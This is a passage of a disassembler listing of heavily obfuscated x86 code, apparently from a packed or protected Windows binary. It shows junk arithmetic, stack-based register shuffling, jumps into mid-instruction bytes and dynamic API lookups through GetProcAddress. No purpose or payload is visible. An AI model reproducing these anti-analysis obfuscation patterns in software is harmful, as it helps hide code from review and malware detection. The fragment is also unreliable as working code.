		add	eax, 0ADD0D5BDh
		mov	eax, [eax]
		jmp	loc_48C8E3
sub_48D4C3	endp

; ---------------------------------------------------------------------------
		align 2
		dw 850Fh
		dd 620h, 0F212E900h, 0FFFFh, 890FCF8Bh,	0FFFFE1C9h, 0FFF639E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D4FA:				; CODE XREF: sub_48B609:loc_48A2BAj
		add	eax, 0FB03CD56h
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+8+var_8]
		jmp	loc_489630
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 89h,	29h, 0E9h
		dd 0FFFFCDB3h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488888

loc_48D515:				; CODE XREF: sub_488888:loc_48889Bj
		and	ebx, 5C312DDh
		or	ebx, 0CE702C4Eh
		cmp	ebx, 0B40D0F2Bh
		jmp	loc_48B362
; END OF FUNCTION CHUNK	FOR sub_488888
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_544. PRESS KEYPAD	"+" TO EXPAND]
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48D530	proc near		; CODE XREF: sub_48B609+6CCj
					; _3gijy9nr:0048DD1Fp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00489D16 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00489ED6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048AECB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0048B2AB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048D072 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D106 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		xchg	eax, [esp+0]
		mov	edi, eax
		pop	eax
		push	edi
		push	114EB7B6h
		jmp	loc_489D16
sub_48D530	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 35F2EA81h, 0A7E9C377h, 0FFFFBBh
; ---------------------------------------------------------------------------

locret_48D550:				; CODE XREF: _3gijy9nr:0048CD3Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D551:				; CODE XREF: sub_48B609+9E7j
		jmp	loc_48D40C
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0FFBF46E9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48D55D	proc near		; DATA XREF: _3gijy9nr:0048CD3Ao
		push	ebx
		push	968C51C6h
		pop	ebx
		rol	ebx, 0Eh
		jmp	loc_48889B
sub_48D55D	endp

; ---------------------------------------------------------------------------
		dd 8FF5F681h, 0DBE840CBh, 0FFFFDAh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D57B:				; CODE XREF: _3gijy9nr:loc_48CCBFj
		mov	eax, 489589h
		jmp	loc_48C743
; ---------------------------------------------------------------------------
		db 52h,	9Ch, 0E8h
		dd 0FFFFCCFDh, 0BD098E0Fh, 8A0FFFFFh, 0FFFFCD9Ch, 9042EA81h
		dd 0B0E832ECh, 0FFFFD5h
		db 0
; ---------------------------------------------------------------------------

loc_48D5A5:				; CODE XREF: _3gijy9nr:0048B146j
		jmp	near ptr dword_489300+66h
; ---------------------------------------------------------------------------
		align 4

loc_48D5AC:				; CODE XREF: _3gijy9nr:0048D6D8p
		xchg	edx, [esp]
		call	sub_48A343
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D5B6:				; CODE XREF: _3gijy9nr:0048A589j
		xchg	eax, [esp]
		pop	eax
		xchg	eax, [esp]
		pop	eax
		add	esi, 6BB3ABDh
		call	loc_488A69
		jmp	loc_48AB45
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D5CF:				; CODE XREF: _3gijy9nr:0048C7D5p
		call	sub_48DA9F
; ---------------------------------------------------------------------------
		dd 8A0F0000h, 0FFFFFC84h
; ---------------------------------------------------------------------------

loc_48D5DC:				; CODE XREF: _3gijy9nr:0048A07Dj
		and	edi, 0F4EA0597h
		test	edi, 100h
		jmp	loc_48DF49
; ---------------------------------------------------------------------------
		db 0C6h, 0, 87h
		dd 0D62EBA58h, 94E90048h, 0FFFFD1h, 1C28100h, 81DB7A98h
		dd 65EEFEF2h, 0D7A06839h, 0B0E90048h
		db 0D5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D613:				; CODE XREF: sub_48B609+25A1j
		call	sub_48A3CF
		cmp	edi, eax
		jmp	loc_48A834
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48D620	proc near		; CODE XREF: _3gijy9nr:0048B193j
					; sub_48B609+5FAp

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		xchg	ecx, [esp-4+arg_0]
		jmp	locret_48B8B7
sub_48D620	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 58D0000h, 489D70h, 0C7666856h, 0C87DF89h, 0E407E924h
		dd 0FFFFh
; ---------------------------------------------------------------------------

loc_48D644:				; CODE XREF: _3gijy9nr:00489E91j
		mov	byte ptr [ebx],	9
		xchg	eax, [esp]
		mov	ebx, eax
		pop	eax
		push	2FFA73DEh
		pop	ecx
		sub	ecx, 0DC54721Ah
		jmp	loc_4897B0
; ---------------------------------------------------------------------------
		dw 1C87h
		dd 16685B24h, 5E2FF4FFh, 4388C681h, 0F68158F8h,	0EA4E1B74h
		dd 4189EE81h, 0F681B035h, 0AB5E929h, 0FFFD55E9h, 8C0F00FFh
		dd 0FFFFEAD1h, 0FFDED6E9h, 810000FFh, 0A97013F3h, 1CEB81FAh
		dd 81A65180h, 0A5F184CBh, 19B850DDh, 0E90048D0h, 0FFFFF959h
		dd 84C68100h, 0E937DCEDh, 0FFFFDA29h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_543. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
		dd 328E0F00h, 0FFFFFDBh, 0FFCCA487h, 0C2CDE9FFh, 0FFFFh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48D6D5:				; CODE XREF: _3gijy9nr:loc_48D0A3j
		xchg	ebx, [esp]
		call	loc_48D5AC
		add	bl, al

; =============== S U B	R O U T	I N E =======================================



sub_48D6DF	proc near		; CODE XREF: _3gijy9nr:0048A6C9p
					; _3gijy9nr:0048A820j

; FUNCTION CHUNK AT 00488BB8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048976F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00489F8D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048B0DE SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		xchg	edx, [esp+0]
		mov	ebx, edx
		pop	edx
		push	3C55065Fh
		pop	eax
		and	eax, 0A1F22A77h
		jmp	loc_489F8D
sub_48D6DF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D6FB:				; CODE XREF: _3gijy9nr:0048B0F4j
		xchg	ebx, [ecx]
		mov	ebp, [edx]
		jmp	sub_48C4AC

; =============== S U B	R O U T	I N E =======================================



sub_48D704	proc near		; CODE XREF: sub_488F35+641p

; FUNCTION CHUNK AT 00488A52 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004892A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AC8B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048AC9E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048ADC7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048CF42 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048D242 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		xchg	ebx, [esp+0]
		mov	edi, ebx
		pop	ebx
		push	5B75EE00h
		jmp	loc_4892A1
sub_48D704	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 81h
		dd 0FF4F86F0h, 0D5856835h, 6CE90048h, 0FFFFD3h
		db 0
; ---------------------------------------------------------------------------

loc_48D729:				; CODE XREF: _3gijy9nr:loc_489AA8j
		mov	byte ptr [edx],	29h
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		jmp	near ptr dword_488798+1Ah
; ---------------------------------------------------------------------------
		align 4

locret_48D738:				; CODE XREF: _3gijy9nr:loc_48C850j
		retn
; ---------------------------------------------------------------------------
		db 0E9h, 0D8h, 0C2h
		dd 7CBBFFFFh, 0E9487FE7h, 0FFFFE833h
		db 0
; ---------------------------------------------------------------------------

loc_48D749:				; DATA XREF: _3gijy9nr:loc_48AB45o
		mov	byte ptr [ebx],	8Dh
		xchg	ebp, [esp]
		mov	ebx, ebp
		pop	ebp
		mov	ebx, ecx
		xchg	ebx, [esp]
		jmp	loc_488A8D
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D75D:				; CODE XREF: sub_48B609+106j
		call	sub_48B429
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0
dword_48D764	dd 5F0F07C6h, 32C88158h, 817D644Dh, 8CBBCEE8h, 8B830F6Ch
					; DATA XREF: _3gijy9nr:00489076o
		dd 0FFFFFAh, 0C7D9E900h, 0FFFFh
; ---------------------------------------------------------------------------

loc_48D784:				; CODE XREF: _3gijy9nr:004892D9j
		jmp	loc_48B627
; ---------------------------------------------------------------------------
		align 2
		mov	eax, 345E261Fh
		xchg	edi, edx
		jmp	loc_48D206
; ---------------------------------------------------------------------------
		dw 8700h
		dd 8FE9243Ch, 0FFFFFCh,	64E8D503h, 0FFFFE9h
		db 0
; ---------------------------------------------------------------------------

loc_48D7A9:				; CODE XREF: _3gijy9nr:0048CB96j
		jmp	loc_48CC95
; ---------------------------------------------------------------------------
		align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_578. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D7B2:				; CODE XREF: sub_48B609+292j
		jmp	loc_48BA3F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0C9C2E900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D7BE:				; CODE XREF: _3gijy9nr:0048DBC3j
		push	0A22893FAh
		pop	edi
		xor	edi, 0D7EEC7B0h
		or	edi, 0D93C3FEDh
		jmp	loc_48ACF9
; ---------------------------------------------------------------------------
		align 2

loc_48D7D6:				; DATA XREF: sub_48A05F+7o
		xchg	edi, [esp]
		push	40310C93h
		pop	eax
		add	eax, 0D9EFB9C2h
		rol	eax, 0Ch
		and	eax, 6F12455Bh
		jnz	loc_48A86F
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D7F4:				; CODE XREF: sub_48B609-F11j
		jmp	loc_48A199
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 85h
		dd 0C1BFE9E8h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AC2D

loc_48D802:				; CODE XREF: sub_48AC2D+Aj
		call	sub_48A83A
		add	cl, ch
		mov	edx, 0C300FFFFh
; END OF FUNCTION CHUNK	FOR sub_48AC2D
; ---------------------------------------------------------------------------
		db 0
		dd 15860F00h, 0BFFFFDEh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48D819:				; CODE XREF: sub_48C67D-126Fj
		push	edi
		mov	edi, edx
		call	sub_48C8EE
		add	[ecx-37637A3Ah], al
		xor	edx, [edi+68h]
		cwde
		mov	al, 0A6h
		or	[edi-17h], ebx
		hlt
; END OF FUNCTION CHUNK	FOR sub_48C67D
; ---------------------------------------------------------------------------
		db 2, 2	dup(0)
; ---------------------------------------------------------------------------

loc_48D834:				; CODE XREF: _3gijy9nr:loc_48DD2Dj
		mov	byte ptr [ebx],	9Ch
		pop	ebx
		pop	eax
		rol	eax, 4
		sub	eax, 18932BB3h
		jmp	loc_48B902
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D848:				; CODE XREF: sub_48B609+B6Cj
		mov	byte ptr [edi],	85h
		xchg	esi, [esp+1Ch+var_1C]
		mov	edi, esi
		pop	esi
		xchg	eax, [esp+18h+var_18]
		mov	esi, eax
		pop	eax
		jmp	loc_48BCAF
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 25E9D31Bh, 0FFFFD7h
		db 0
byte_48D865	db 68h,	9Ah, 0F2h	; DATA XREF: _3gijy9nr:004894E6o
		dd 1C872AEAh, 5BC38B24h, 5801E081h, 0ACE9FC40h,	0FFFFC2h
		dd 5107C600h, 8B240C87h, 7A5559F9h, 0FFE8AAE9h,	8E63B9FFh
		dd 82E90048h, 0FFFFE5h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D898:				; CODE XREF: sub_48B609:loc_489F75j
		sbb	ecx, 0FC868D39h
		jmp	sub_488888
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------

loc_48D8A3:				; CODE XREF: _3gijy9nr:0048AE23j
		push	offset loc_48D0E7
		jmp	near ptr dword_48893C+35h
; ---------------------------------------------------------------------------
		align 2
		dw 0B850h
		dd offset dword_488C00+0F8h
		dd 0FFE1D6E9h, 0DCAEE8FFh, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C9A0

loc_48D8C0:				; CODE XREF: sub_48C9A0+Aj
		jmp	loc_488AF4
; END OF FUNCTION CHUNK	FOR sub_48C9A0
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_489E9B

loc_48D8C6:				; CODE XREF: sub_489E9B+Aj
		jmp	near ptr dword_489454+0Fh
; END OF FUNCTION CHUNK	FOR sub_489E9B
; ---------------------------------------------------------------------------
		align 4
		dd 0C300h, 8CE9D68Bh, 2BFFFFC5h, 0BF95E9FDh
		db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_564. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D8DF:				; CODE XREF: sub_48B609-1947j
		jmp	near ptr loc_48C4BC+1
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_542. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h
		dd 0FFFFDF2Ch, 0C1F70000h, 179A3A93h, 0FFC9FCE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D8FB:				; CODE XREF: sub_48B609:loc_48C19Fj
		sub	esi, 658FB11Fh
		add	esi, 22CAA509h
		add	eax, esi
		pop	esi
		push	eax
		mov	eax, edx
		xchg	eax, [esp+1Ch+var_1C]
		jmp	loc_48CD4E
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 0FFFE3781h, 0E9F50BFFh, 0FFFFB853h, 50E28100h, 0E96F48F4h
		dd 0FFFFB01Ah
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_563. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D933:				; CODE XREF: _3gijy9nr:0048CDFEj
		call	ds:dword_45D0BC	; GetProcAddress
		push	489E32h
		jmp	loc_48A9DF
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_581. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 51h
		dd 48B438B9h, 0F83DE900h, 0FFFFh, 0EBB38A0Fh, 0F71BFFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48D95C	proc near		; CODE XREF: _3gijy9nr:0048CCBAp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048B455 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0048D2C2 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		xchg	edx, [esp+0]
		mov	ecx, edx
		jmp	loc_48B455
sub_48D95C	endp

; ---------------------------------------------------------------------------
		align 2
		dw 0E581h
		dd 6CABD0F2h, 0FFC382E9h
		db 0FFh
; ---------------------------------------------------------------------------

locret_48D975:				; CODE XREF: _3gijy9nr:0048B114j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D976:				; CODE XREF: sub_48B609+1E6j
		jmp	locret_48BAEA
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0C87CE900h, 0FFFFh
; ---------------------------------------------------------------------------

locret_48D984:				; CODE XREF: _3gijy9nr:loc_48D3E0j
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D986:				; CODE XREF: sub_48B609+3F6j
		jmp	loc_48DBA4
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48D98D:				; CODE XREF: _3gijy9nr:0048A854j
		jmp	loc_48B824
; ---------------------------------------------------------------------------
		xor	edx, 0A0DCDF0Fh
		xchg	ebx, [esp]
		pop	ebx
		add	eax, 0B10702B2h
		popf
		lahf
		add	al, 24h
		jmp	loc_48DE7D
; ---------------------------------------------------------------------------
		align 4
		dd 0E715E900h, 820FFFFFh, 0FFFFDA25h, 0FFFA94E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48A289

loc_48D9BE:				; CODE XREF: sub_48A289+15j
		rol	edx, 8
		and	edx, 0FE335BD9h
		push	esi
		push	0A7AB280Eh
		pop	esi
		and	esi, 0C5266542h
		sub	esi, 0C762228Ah
		jmp	loc_48CEFB
; END OF FUNCTION CHUNK	FOR sub_48A289
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48C090

loc_48D9E0:				; CODE XREF: sub_48C090+11j
		or	edi, 0BCF27EDh
		sub	edi, 9941C53h
		add	edi, 9E0D7E52h
		popf
		mov	eax, 2AE9243Ch
		jmp	near ptr 6849D9FCh
; END OF FUNCTION CHUNK	FOR sub_48C090
; ---------------------------------------------------------------------------
		dd offset loc_489794
; ---------------------------------------------------------------------------
		jmp	locret_48DCE7
; ---------------------------------------------------------------------------
		align 4
		dd 598E8h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE8D

loc_48DA0F:				; CODE XREF: sub_48CE8D+12j
		pop	esi
		add	esi, 7D69A5D9h
		or	esi, 83CA5D44h
		add	esi, 2C21A2F1h
		test	eax, esi
		jmp	loc_48DCA4
; END OF FUNCTION CHUNK	FOR sub_48CE8D
; ---------------------------------------------------------------------------
		align 2
		dw 800Fh
		dd 0FFFFFEB7h, 0E909E5C1h, 0FFFFDBD1h
; ---------------------------------------------------------------------------

loc_48DA38:				; CODE XREF: _3gijy9nr:0048A502j
		xchg	esi, [esp]
		pop	esi
		push	offset word_48DA46
		jmp	loc_48DD34
; ---------------------------------------------------------------------------
word_48DA46	dw 7C6h			; DATA XREF: _3gijy9nr:0048DA3Co
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 5Fh,	0E8h, 0A1h
; ---------------------------------------------------------------------------
		jmp	short near ptr loc_48DA4C+1 ; CODE XREF: _3gijy9nr:loc_48DA4Cj
; ---------------------------------------------------------------------------
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DA4F:				; CODE XREF: sub_48B609+2B4j
		jmp	loc_48C8C1
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DA55:				; CODE XREF: sub_48B609+1DAj
		jmp	near ptr dword_488E8C+7Dh
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ADD6

loc_48DA5A:				; CODE XREF: sub_48ADD6-253j
		jmp	loc_48DB3A
; END OF FUNCTION CHUNK	FOR sub_48ADD6
; ---------------------------------------------------------------------------
		align 10h
		dd 66A3C6F7h, 24E9BC49h, 0FFFFCFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DA6C:				; CODE XREF: sub_48B609:loc_48A930j
		pushf
		push	0AAA4AA1Fh
		pop	edx
		or	edx, 561DC5EEh
		sub	edx, 0AFA37F29h
		xor	edx, 58BB3010h
		jmp	loc_48BCA8
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 487h
		dd 7895824h, 27E89C5Fh,	0FFFFBAh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48DA98:				; CODE XREF: sub_48D1F6-302Fj
		jmp	loc_48CD19
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48DA9F	proc near		; CODE XREF: _3gijy9nr:loc_48D5CFp

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		pop	edx
		push	7C1A1242h
		jmp	loc_48BA06
sub_48DA9F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 3, 0D0h, 0E8h
		dd 0FFFFEE62h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48DAB9	proc far		; CODE XREF: _3gijy9nr:loc_48D003p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0FFh
		pop	eax
		jmp	near ptr dword_48BB08+2
sub_48DAB9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 0E92ADD81h, 0E5C1812Bh, 0EF79E91Fh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48DAD6:				; CODE XREF: _3gijy9nr:0048B423j
		popf

loc_48DAD7:				; CODE XREF: _3gijy9nr:0048AB13j
		push	ebx
		push	0B0DFCD26h
		xchg	ebp, [esp]
		mov	ebx, ebp
		pop	ebp
		and	ebx, 35A25BE7h
		rol	ebx, 19h
		jmp	loc_48CAC9
; ---------------------------------------------------------------------------
		db 50h,	0B8h, 0FCh
		dd 0E90048B8h, 0FFFFE41Ah, 8E0F0000h, 49Ah, 48CD5468h
		dd 0FCFAE900h, 0DF81FFFFh, 0EA8E2AFDh, 57E83389h
		db 0D9h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48DB1B:				; CODE XREF: _3gijy9nr:0048C5D1j
		jmp	loc_48B22C
; ---------------------------------------------------------------------------

loc_48DB20:				; CODE XREF: _3gijy9nr:0048A284j
		jmp	locret_48AB64
; ---------------------------------------------------------------------------
		align 2
		pop	esi
		retn
; ---------------------------------------------------------------------------
		dd 0FFC19CE9h, 0DBAEE9FFh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48DB32:				; CODE XREF: _3gijy9nr:0048A213j
		push	ebp
		mov	ebp, edx
		jmp	loc_48CF0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ADD6

loc_48DB3A:				; CODE XREF: sub_48ADD6:loc_48DA5Aj
		push	offset byte_48D439
		jmp	loc_48BD64
; END OF FUNCTION CHUNK	FOR sub_48ADD6
; ---------------------------------------------------------------------------

loc_48DB44:				; CODE XREF: _3gijy9nr:00489FDBj
		test	eax, 0AC9FC025h
		jmp	loc_48A13B
; ---------------------------------------------------------------------------
		align 10h
		dd 241C8700h, 7968565Bh, 5E1DE53Ch, 67E1EE81h, 0C68187D6h
		dd 6A39C44Ch, 0FFF043E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DB6F:				; CODE XREF: sub_48B609-2598j
		jnz	loc_48A4A3
		add	[edi], cl
		xor	dword ptr [ebx], 2BFFFFEDh
		jmp	near ptr 3FEE6Bh
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0FFh
		db 0
; ---------------------------------------------------------------------------

loc_48DB85:				; CODE XREF: _3gijy9nr:0048AB0Ej
		call	sub_48A799
		jns	near ptr dword_48893C+0Eh
		adc	ebx, 0BF60ACACh
		jmp	loc_48A947
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_559. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DB9F:				; CODE XREF: sub_48B609-49Cj
		jmp	loc_48B709
; ---------------------------------------------------------------------------

loc_48DBA4:				; CODE XREF: sub_48B609:loc_48D986j
		add	eax, 7D88C24Ah
		jmp	loc_48D613
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48DBB1:				; CODE XREF: _3gijy9nr:00488DF6j
		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp]
		mov	ebp, eax
		xchg	ebp, [esp]
		call	ds:dword_45D0B4	; GetModuleHandleA
		push	edi
		jmp	loc_48D7BE
; ---------------------------------------------------------------------------
		dd 1FEAC100h, 0FFE132E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DBD1:				; CODE XREF: sub_48B609:loc_48BADDj
		push	offset loc_488E7C
		jmp	nullsub_547
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48DBDD:				; CODE XREF: _3gijy9nr:004897D1j
		jl	near ptr dword_488FA0+4Ch
		add	eax, 270EFFA0h
		xor	eax, 7759F57h
		push	488D41h
		jmp	locret_48B500
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DBF9:				; CODE XREF: sub_48B609:loc_48BD99j
		jge	loc_48CE15
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
		dd 0DCB1E900h, 8E0FFFFFh, 2B4h,	0FFF1F5E9h, 0C10000FFh
		dd 0FE902E0h, 0FFFFEDh,	241C8700h, 87BF575Bh, 0E90048D8h
		dd 0FFFFFC51h, 768A0F00h, 87FFFFC5h, 359240Ch, 92DE68D5h
		dd 0C5E90048h, 51FFFFF0h, 0FFB089E9h, 130000FFh
		db 0EAh
; ---------------------------------------------------------------------------

loc_48DC4D:				; CODE XREF: _3gijy9nr:0048B523j
		xor	edi, 6771C6F6h
		test	edi, 8
		jmp	near ptr dword_488E8C+97h
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DC5F:				; CODE XREF: sub_48B609:loc_48BA19j
		pop	esi
		rol	ebx, 10h
		or	ebx, 8D38D23Ah
		xor	ebx, 7064AA21h
		and	ebx, 353CD724h
		push	offset word_48DE92
		jmp	nullsub_566
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48DC81:				; CODE XREF: _3gijy9nr:0048D290j
		call	loc_48A092
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DC87:				; CODE XREF: sub_48B609+C9Aj
		jmp	loc_48CE67
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48DC8D:				; CODE XREF: _3gijy9nr:0048A2EEj
		jmp	locret_48B73F
; ---------------------------------------------------------------------------

loc_48DC92:				; CODE XREF: _3gijy9nr:0048A279j
		jmp	near ptr unk_488AB0
; ---------------------------------------------------------------------------
		align 4
		dd 0E5E9FD3Bh
		db 0F2h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48DC9F:				; CODE XREF: sub_48B609-85Aj
		call	sub_489879
; END OF FUNCTION CHUNK	FOR sub_48B609
; START	OF FUNCTION CHUNK FOR sub_48CE8D

loc_48DCA4:				; CODE XREF: sub_48CE8D+B97j
		jmp	loc_48B5F6
; END OF FUNCTION CHUNK	FOR sub_48CE8D
; ---------------------------------------------------------------------------
		align 2
		dw 2FE9h
		dd 0FFFFB4h, 0F7FF8100h, 0E95AE84Ah, 0FFFFE372h, 1BBB0000h
		dd 0E9004894h, 0FFFFFD40h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_48DCC8:				; CODE XREF: sub_488F35:loc_48A818j
		rol	eax, 1
		sub	eax, 60CDFD1Fh
		xor	eax, 0E94B6C47h

loc_48DCD6:				; DATA XREF: sub_488F35+26B7o
